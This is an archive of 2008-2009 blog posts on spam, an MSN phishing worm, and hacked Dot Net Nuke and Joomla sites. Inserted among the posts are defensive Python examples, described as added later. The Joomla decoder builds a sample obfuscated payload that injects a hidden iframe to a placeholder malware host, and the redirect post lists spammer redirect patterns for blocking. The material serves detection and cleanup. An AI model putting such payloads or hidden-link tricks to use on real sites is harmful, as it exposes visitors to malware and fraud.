MSN worm making rounds?

April 19th, 2009

I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.

Facebook viral group spam

March 10th, 2009

Spammers appear to have set their sights on Facebook for spamming purposes. But since outgoing links have rel nofollow, it’s no good for Googlejuice. So let’s examine an actual example of a group set up for spam purposes:

http://www.facebook.com/group.php?gid=56828903531

It’s a group touting something called ProfileLock. Problem is, there’s no such thing. It’s just a clever second attempt at hawking wares (in this case, it’s an SEO firm).

The website associated with the group is called GoogleMarketing101.com. Normally variations on Google are not owned by Google, so I checked. The address was in Florida, in an area where spammers abound. I checked the name, the address and the domain name. The owner has talked about Facebook and SEO before. And he’s also made a Facebook group before, only it didn’t do so well: http://www.facebook.com/pages/Google-Marketing-101/46023747363

So what does he do? He capitalizes on the paranoia of people who have lost their profiles before due to some infraction or other. And the guy who sent the invitation to me DID lose his profile once. THAT’s where viral comes into the picture. People are gullible, and join because they have a need. What they don’t realize is that this is just a ploy to get people to click on the link, which is what it’s actually about.

This particular group promises that if you post the name on your Facebook profile along with your ID number, you will lock it in. It’s a scam. That group is very likely to disappear. You’re better off saving that data on your computer somewhere.

I’m sure Joel wouldn’t consider himself a spammer. After all, he doesn’t send out invitations to this group himself, he tricks his friends into doing it. Yes, I have a friend in common with this guy. So I’m not so much saying he’s a spammer as I’m saying this group is a scam, and I’m lumping the attempt in with other stuff I see on the web that I consider “spammy”.

Dot Net Nuke hacking

March 3rd, 2009

These hacks are the least likely to be spotted of any I’ve ever seen.

Andrew Jensen commented on a post, leaving this case story of a Dot Net Nuke hacking.

I checked into some sites that had been hacked, and here’s what I found (and do read his post first):

On one site, the hacked links were inserted into the links at the very top, a div class named headerlinks. The hacked links were placed
top: -1500px; position: absolute
and
z-index: -2; position: absolute

On another site the links were placed prior to the main column.

It seems these links may be individually or randomly placed on the page. And the position (outside the browser window) also appears to be random.

I also found one hacked link that was placed differently:
position: absolute; left: 0px; bottom: 0px; font-size: 0.5em

That same site appeared to have a second, earlier hacking right above, with this code:
div style="display: none"

One site seemed to proudly display the links, as Sponsors, while another touted the site in a blog post. A third had a small text link under the Google Ad block.
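The CSS tricks listed above (a huge negative top offset, a negative z-index, display: none, a half-size font) all share one property: a human visitor never sees the link, while a crawler does. As an added example that is not part of the original post, here is a small scanner that walks a page's HTML and reports every link that is hidden by its own inline style or by an ancestor's. The thresholds (-500px, 0.5em, 6px) and the sample markup are my own assumptions, modelled on the styles quoted above.

```python
"""Find links hidden with inline CSS, the way the links in the hacked Dot Net
Nuke sites above were hidden. Added example, not code from the original post;
the thresholds (-500px, 0.5em, 6px) and the sample page are assumptions."""
from __future__ import annotations
import re
from html.parser import HTMLParser


def hide_reasons(style: str) -> list[str]:
    """Return why an inline style hides its element; an empty list means visible."""
    decls = {}
    for part in style.split(";"):
        if ":" in part:
            k, v = part.split(":", 1)
            decls[k.strip().lower()] = v.strip().lower()
    reasons = []
    if decls.get("display") == "none" or decls.get("visibility") == "hidden":
        reasons.append("display/visibility hidden")
    if decls.get("position") == "absolute":
        # Large negative offsets push the element outside the viewport.
        for prop in ("top", "left", "right", "bottom"):
            m = re.match(r"(-?\d+(?:\.\d+)?)", decls.get(prop, ""))
            if m and float(m.group(1)) <= -500:
                reasons.append(f"off-screen {prop}={decls[prop]}")
    if re.fullmatch(r"-\d+", decls.get("z-index", "")):
        reasons.append(f"negative z-index={decls['z-index']}")
    m = re.match(r"(\d+(?:\.\d+)?)\s*(px|pt|em)?", decls.get("font-size", ""))
    if m:
        size, unit = float(m.group(1)), m.group(2) or "px"
        if (unit == "em" and size <= 0.5) or (unit != "em" and size <= 6):
            reasons.append(f"tiny font-size={decls['font-size']}")
    return reasons


class HiddenLinkFinder(HTMLParser):
    """Collects <a href> elements hidden by their own style or by an ancestor's."""
    VOID = {"br", "img", "hr", "input", "meta", "link"}

    def __init__(self) -> None:
        super().__init__()
        self._stack: list[list[str]] = []   # hide reasons, one entry per open element
        self.found: list[tuple[str, list[str]]] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.VOID:
            return
        a = dict(attrs)
        self._stack.append(hide_reasons(a.get("style") or ""))
        if tag == "a" and a.get("href"):
            inherited = [r for rs in self._stack for r in rs]
            if inherited:
                self.found.append((a["href"], inherited))

    def handle_endtag(self, tag):
        if tag not in self.VOID and self._stack:
            self._stack.pop()


def find_hidden_links(html: str) -> list[tuple[str, list[str]]]:
    """Return (href, reasons) for every hidden link in the markup."""
    p = HiddenLinkFinder()
    p.feed(html)
    p.close()
    return p.found


# Constructed sample page using the same styles the hacked sites used.
SAMPLE = """
<div class="headerlinks">
  <a href="/home">Home</a>
  <div style="top: -1500px; position: absolute">
    <a href="http://spam.invalid/mp3">cheap mp3</a>
  </div>
  <div style="z-index: -2; position: absolute"><a href="http://spam.invalid/movies">movies</a></div>
</div>
<a style="position: absolute; left: 0px; bottom: 0px; font-size: 0.5em" href="http://spam.invalid/pills">pills</a>
<div style="display: none"><a href="http://spam.invalid/old">old</a></div>
<p>Sponsors: <a href="http://partner.invalid/">visible link</a></p>
"""

if __name__ == "__main__":
    for href, why in find_hidden_links(SAMPLE):
        print(href, "<-", "; ".join(why))
```

Run it against a saved copy of the page (or the Google cache, as in the post) rather than the live site; the positions are random per the post, so checking only the header div is not enough.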

Here are the links I found apparently hacked into Dot Net Nuke installations. They may not all have been inserted by the same hacker:

filespie.com
movie2b.com
qarea.com
gigsofmp3.com
zmovielibrary.com
allgenresmusic.com
mp3filesdirectory.com

Update: qarea.com is affiliated with bughuntress.com, which has no shady links. We of course don’t know if they’ve paid for the hacking, or if someone included their site anyway.

Hacked Joomla site

February 26th, 2009

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.
[Image: cyberstalking.co.uk]
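The hacked 404 page described above wraps its payload in eval(unescape("...")), so the iframe only appears once the percent-encoded string is decoded. As an added example that is not part of the original post, here is a decoder that peels that wrapper (including nested ones) and lists any iframe the decoded script would inject, together with whether it is sized or styled to be invisible. The sample page is constructed inside the block and the malware host name is a placeholder, not the Russian site from the post.

```python
"""Decode the eval(unescape("...")) layer found in the hacked 404 page above and
report any <iframe> the decoded script injects. Added example, not code from
the original post; the sample page is constructed here and the host name is a
placeholder."""
from __future__ import annotations
import re

EVAL_RE = re.compile(r"""eval\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX is a UTF-16 unit, %XX a Latin-1 byte."""
    return re.sub(
        r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s: str) -> str:
    """Inverse of js_unescape, used only to build the constructed sample."""
    return "".join(
        c if c.isalnum() and ord(c) < 128
        else (f"%u{ord(c):04X}" if ord(c) > 255 else f"%{ord(c):02X}")
        for c in s)


def peel_eval_unescape(src: str, max_layers: int = 5) -> list[str]:
    """Decode nested eval(unescape()) wrappers, outermost first."""
    layers, cur = [], src
    for _ in range(max_layers):
        m = EVAL_RE.search(cur)
        if not m:
            break
        cur = js_unescape(m.group(2))
        layers.append(cur)
    return layers


def find_iframes(markup: str) -> list[dict]:
    """List iframes with their src and whether they are sized/styled to be invisible."""
    frames = []
    for m in IFRAME_RE.finditer(markup):
        attrs = {k.lower(): (a or b or c) for k, a, b, c in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (
            attrs.get("width", "").rstrip("px") in {"0", "1"}
            or attrs.get("height", "").rstrip("px") in {"0", "1"}
            or "display:none" in style or "visibility:hidden" in style
        )
        frames.append({"src": attrs.get("src", ""), "hidden": hidden, "attrs": attrs})
    return frames


# Constructed 404 page carrying the same shape of payload as the hacked site.
PAYLOAD = ('document.write(\'<iframe src="http://malware-host.invalid/in.php" '
           'width=0 height=0 style="visibility:hidden"></iframe>\')')
SAMPLE_PAGE = ('<h1>404 - Not Found</h1>\n<script>eval(unescape("'
               + js_escape(PAYLOAD) + '"))</script>')

if __name__ == "__main__":
    for i, layer in enumerate(peel_eval_unescape(SAMPLE_PAGE), 1):
        print(f"layer {i}: {layer}")
        for f in find_iframes(layer):
            print(f"  iframe -> {f['src']} (hidden={f['hidden']})")
```

Decoding the string is the safe way to read it: the text is never passed to a JavaScript engine, so nothing is fetched from the iframe target. As the post notes, the decoded src may itself be a loader that pulls the real exploit from a third site, so treat the decoded host as a lead, not the whole picture.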

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know. According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.

Here’s an analysis of who is behind this (Nov 2007)

MyDailyFlog sends deceptive invites

December 20th, 2008

There’s a guy in my “network” who keeps on joining one network after another. And he always sends me invitations. They go straight in the “half spam” bucket.

The latest invitation piqued my curiosity. It was from mydailyflog.com, and it said:

Hi!
I would like to invite you to visit MyDailyFlog and see my latest photos.

And then the link, which was in this format:

http://www.mydailyflog.com/go/invite_register/randomusername/somenumber

Hmm, this doesn’t look to me like the link to a post with his latest photos? Because if he was sending me an invitation to view his latest photos, I’d be inclined to go check them out. But invite_register? That sounds awfully like fanbox behavior. How do I know they won’t create a profile for me just from that link? I had to test it, but not with my own e-mail address - I don’t want to encourage them to keep spamming me, so I found a random invitation in Google (yes I know, it’s ethically questionable, but Google has followed a bunch of those already, so…).

And yes, they have the e-mail address filled out, and are just waiting for my password.

Oh, and he has no photos at all yet, so this wasn’t a specific invitation to me, which I wouldn’t mind - for specific photos he manually invited me to see, but an attempt to get me to sign up.

I also checked the Terms of Service, and they state among other things that:

…You are solely responsible for any use of or action taken under your password on the Site. Your password may be used only to post Posted Content, review information regarding potential and completed transactions and otherwise access and use the Site and Services in accordance with these Terms and Conditions…. …You accept full responsibility for all transactions and other activity placed or conducted through your account and agree to and hereby release MyDailyFlog from any and all liability concerning such transactions or activity….

There’s just one problem with that… The e-mail I received was not sent by my friend, but by the dailyflog system - which means he either expressly gave them my address, or gave them access to his address book, presumably by giving them his webmail password.

So… Dailyflog sends out invitations, and you’re responsible. Now, why does that sound familiar?

Update: Very funny, I now got an invitation with a link identical to the one I put into this blog post. Serves me right for including the number at the end, which was identical to the number on the first invitation I got. So it’s possible that the number identifies a specific e-mail address regardless of who the “inviter” is?

Hacked vacation responses

December 15th, 2008

I’ve sent out a few newsletters recently, and got one reply that raised my suspicions. It was a vacation reply that hawked a website, and it looked like spam. Although I don’t know the person who owns the e-mail address, I suspect she was hacked, and somebody turned on her vacation response and filled it with their spam.

hi:
Heya, how are you doing recently ? I would like to introduce you a very good company which I knew. Their company homepage is www.sugefa.com. They can offer you all kinds of electronical products which you need, such as motorcycles, laptops, mobile phones, digial cameras, TV LCD,xbox, ps3, gps, MP3/4, etc. Please take some time to have a look at it, there must be something you ‘d like to purchase.
Their contact email: sugefa@188.com.
MSN: sugefa@hotmail.com
TEL: +8610-80973507
Hope you have a good mood in shopping from their company!
Regards

I’ve found the same sentences on the net, on a blog that seems to use e-mail to post. The owner probably didn’t send some of those posts from September and October.

Here’s a report on this spammer/hacker.

If you see a vacation response like this, please notify the person it came from, maybe via Facebook or another address as well if you can. They’re usually so mortified they got hacked, so they might not reply to you, unfortunately. Getting hacked is no longer something to be ashamed of. There are so many ways they hack people, you’ll have to be VERY good with computers and very lucky to avoid ever being hacked.

More people talking about this phenomenon:

Computerhope
taint.org

Estdomains history

December 1st, 2008

Estdomains, home to lots of spam domains, is now history. Good riddance!

Swedish domain names hijacked

November 29th, 2008

I wrote a while ago about a network of pages with fake biographies generated from a database and a script. Well, Phonera/Port80 has upped the ante.

Now they’ve created fake descriptions of Swedish domain names (yes, existing ones) on the same network of IP addresses. The net result is that those fake pages rank well if you search for that domain name. And presumably also if you search for the part before .se.

None of the pages are served right now, they return “socket error”. But they’re still filling up the Google index with junk.

The way I see it, Google should dump the entire 93.158.64.0 - 93.158.127.255 range now including the cache, when those pages are referenced by IP number instead of a domain name. And put a block on that IP range preventing those IP numbers from being crawled in the future, unless it’s a domain name that’s resolving to that IP range. Although there are some domains in that range, if you make sure you only nuke pages referenced by the IP number in Google, you should be golden.

Cookie stuffing images on forums

November 26th, 2008

I got an e-mail from a forum owner, asking about a particular behavior on his forum.

Several people had signed up for accounts and were posting low content posts on lots of threads. Looked like just another “me too” type poster until they saw a broken image link in edit view. The image didn’t show up in the post that he could see. Hence the mail to me.

One of the user names was SEOdeveloping, which made the forum owner do some digging. He turned up a Cookie Stuffing script posted for sale by someone by the same nick.

I checked out the image link, and found there were a couple of 302 redirects in place, which made me think something was up - no point in using PHP redirects unless you’re up to something.

So I connected the two dots, and searched for these words:

cookie stuffing images

I found an article by former regular Esrun, explaining the technique. It’s the technique labeled image/2. Basically, they’re shoving a cookie on your system. Presumably they’re an affiliate of some well known site, and if you happen to visit that site and sign up or buy something, the cookie stuffer will get the signup bonus or affiliate percentage.

So time to send out a warning: Be careful about allowing your users to post images pointing to sites other than those you control. Otherwise you might have to check the images carefully.

This time, the domain the image sat on was photo-shack.com, which resembles closely a well known image hosting site. And although the image didn’t work the first time I checked one of the posts, it did the second time. I did receive a cookie from photo-shack.com each time I loaded that forum post, whether or not the smiley was visible. It was a nice Christmas smiley, and I’m guessing that spam campaign has been quite successful - they’re posting manually, the posts are on topic, and they’re behaving themselves. It doesn’t appear to be spam, because there’s no visible payoff.

But they ARE stuffing cookies.

Here’s a random hit from Google, with not one but TWO images loading from his fake image hosting site.
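The giveaway in the post was that an "image" went through two 302 redirects and set a cookie whether or not the smiley rendered. As an added example that is not part of the original post, here is an audit routine a forum owner could run over posted image URLs: it follows the redirect chain hop by hop without sending cookies, and flags any hop that sets a cookie, any hop that leaves the original host, a final resource that is not an image, and (optionally) a host that is not on an allowlist. The fetcher and its responses are constructed so the block runs offline; swap in a real HEAD request for production use. The domain names are placeholders.

```python
"""Audit an image URL posted to a forum the way the cookie-stuffing smileys
above worked: follow its redirect chain and flag anything that is not simply
an image. Added example, not code from the original post; the fetcher and the
responses are constructed so it runs offline (swap in a real HEAD request)."""
from __future__ import annotations
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}

# Constructed responses: url -> (status, headers). Domains are placeholders.
FAKE_RESPONSES = {
    "http://photo-shack.invalid/xmas-smiley.gif":
        (302, {"Location": "http://go.photo-shack.invalid/r.php?id=77"}),
    "http://go.photo-shack.invalid/r.php?id=77":
        (302, {"Location": "http://merchant.invalid/?aff=1234",
               "Set-Cookie": "aff=1234; Max-Age=2592000"}),
    "http://merchant.invalid/?aff=1234":
        (200, {"Content-Type": "text/html",
               "Set-Cookie": "affiliate=1234; Max-Age=2592000"}),
    "http://img.invalid/cat.png": (200, {"Content-Type": "image/png"}),
}


def fake_fetch(url: str) -> tuple[int, dict[str, str]]:
    """Stand-in for an HTTP HEAD/GET that sends no cookies and follows nothing."""
    return FAKE_RESPONSES.get(url, (404, {}))


def audit_image_url(url: str, fetch=fake_fetch, allowed_hosts=frozenset(),
                    max_hops: int = 5) -> dict:
    """Return the hop list plus findings; any finding makes the URL suspicious."""
    findings = []
    origin = urlparse(url).hostname
    if allowed_hosts and origin not in allowed_hosts:
        findings.append(f"host {origin} is not an approved image host")
    hops = [url]
    status, headers = fetch(url)
    for _ in range(max_hops):
        if "Set-Cookie" in headers:
            findings.append(f"{hops[-1]} sets a cookie (an image should not)")
        if status in REDIRECT_CODES and "Location" in headers:
            nxt = urljoin(hops[-1], headers["Location"])
            hops.append(nxt)
            if urlparse(nxt).hostname != origin:
                findings.append(f"redirects off-host to {urlparse(nxt).hostname}")
            status, headers = fetch(nxt)
            continue
        break
    else:
        findings.append(f"more than {max_hops} redirects")
    ctype = headers.get("Content-Type", "")
    if status == 200 and not ctype.startswith("image/"):
        findings.append(f"final resource is {ctype or 'unknown'}, not an image")
    return {"hops": hops, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for u in ("http://photo-shack.invalid/xmas-smiley.gif", "http://img.invalid/cat.png"):
        result = audit_image_url(u, allowed_hosts=frozenset({"img.invalid"}))
        print(u, "->", "SUSPICIOUS" if result["suspicious"] else "ok")
        for f in result["findings"]:
            print("   ", f)
```

A strict allowlist of image hosts is the simplest defence and is what the post recommends; the redirect audit is for forums that cannot restrict hosts and want to catch a look-alike domain such as the photo-shack one above. Note that the check treats any subdomain change as off-host, which will also flag legitimate CDNs, so tune that test to your own hosts.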

Redirects in webspam

November 24th, 2008

I haven’t blogged much about webspam lately. Akismet kills most of it, so I’m not as annoyed.

But enter a new Wordpress installation. It took a few weeks for the first spam to arrive, and then I attracted a regular. Geez, that’s annoying. I hadn’t had time to do something about the spam yet, but it was starting to annoy me enough that I took a closer look.

What I found was a lot of redirects to spammy sites from innocent third parties. Many of them from Bitrix installations, but judging from the URLs, there are plenty of other susceptible redirect scripts. Here’s a sampling of URL patterns you could block in blog and forum software, which would silently get rid of a lot of spam posts:

external.php?url=http://
go.cgi?dest=http://
go.asp?url=http://
link.php?url=http://
links_ext.pl?http://
out.php?url=http://
rd?t=http://
redirect.cfm?trgturl=http://
redirect.php?goto=http://
redirect.php?url=http://

Another bad thing about these scripts is that you could pick up a trojan by going to a site you thought was safe, if you didn’t notice that the redirect actually pointed somewhere other than the safe site the redirect script is sitting on.
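The patterns listed above all have the same shape: a script name followed by a parameter whose value is itself an absolute URL. As an added example that is not part of the original post, here is a comment filter that encodes that list and also applies the general rule (any query parameter, or a bare query string, that starts with http:// or https://), so it catches redirect scripts not on the list as well. It decodes percent-encoded values, since a spammer can write http%3A%2F%2F to dodge a plain substring match. The sample comment and domain names are constructed.

```python
"""Flag comment-spam links that go through someone else's redirect script, using
the script/parameter patterns listed above. Added example, not code from the
original post; the sample comment and domains are constructed."""
from __future__ import annotations
import re
from urllib.parse import parse_qsl, urlparse

# Redirect scripts named in the post: script file -> parameters that carry the
# destination ("*" = the destination is the whole query string, links_ext.pl style).
KNOWN_REDIRECTORS = {
    "external.php": {"url"}, "go.cgi": {"dest"}, "go.asp": {"url"},
    "link.php": {"url"}, "links_ext.pl": {"*"}, "out.php": {"url"},
    "rd": {"t"}, "redirect.cfm": {"trgturl"}, "redirect.php": {"goto", "url"},
}
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
ABS_URL_RE = re.compile(r"https?://", re.I)


def classify_url(url: str) -> dict:
    """Decide whether a URL is a redirect to a second, absolute URL.

    Known scripts get a 'known_script' hit; any other URL whose query carries an
    absolute URL is still reported, which catches redirectors not on the list."""
    p = urlparse(url)
    script = p.path.rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes, so url=http%3A%2F%2F... is seen as a URL too.
    for key, value in parse_qsl(p.query, keep_blank_values=True):
        if ABS_URL_RE.match(value):
            param, target = key.lower(), value
        elif ABS_URL_RE.match(key):          # bare "?http://..." form
            param, target = "*", key
        else:
            continue
        known = param in KNOWN_REDIRECTORS.get(script, set())
        return {"redirect": True, "known_script": known, "script": script,
                "param": param, "target": target}
    return {"redirect": False, "known_script": False, "script": script,
            "param": None, "target": None}


def scan_comment(text: str) -> list[tuple[str, str]]:
    """Return (posted_url, real_destination) for every redirect link in a comment."""
    hits = []
    for url in URL_RE.findall(text):
        info = classify_url(url)
        if info["redirect"]:
            hits.append((url, info["target"]))
    return hits


# Constructed comment: two links through third-party redirectors, one clean link.
SAMPLE_COMMENT = (
    "Nice post! See http://innocent.invalid/forum/out.php?url=http://pills.invalid/buy "
    "and also http://docs.invalid/page.php?id=3 plus "
    "http://other.invalid/redirect.cfm?trgturl=http%3A%2F%2Fpills.invalid%2Fdeal"
)

if __name__ == "__main__":
    for posted, real in scan_comment(SAMPLE_COMMENT):
        print(f"{posted}\n    really goes to {real}")
```

Blocking on the general rule rather than the fixed list is what makes this hold up as new redirect scripts appear; the list is still worth keeping so the log can say which known script was abused. Legitimate sites do sometimes link through their own redirector, so hold such comments for moderation rather than dropping them silently.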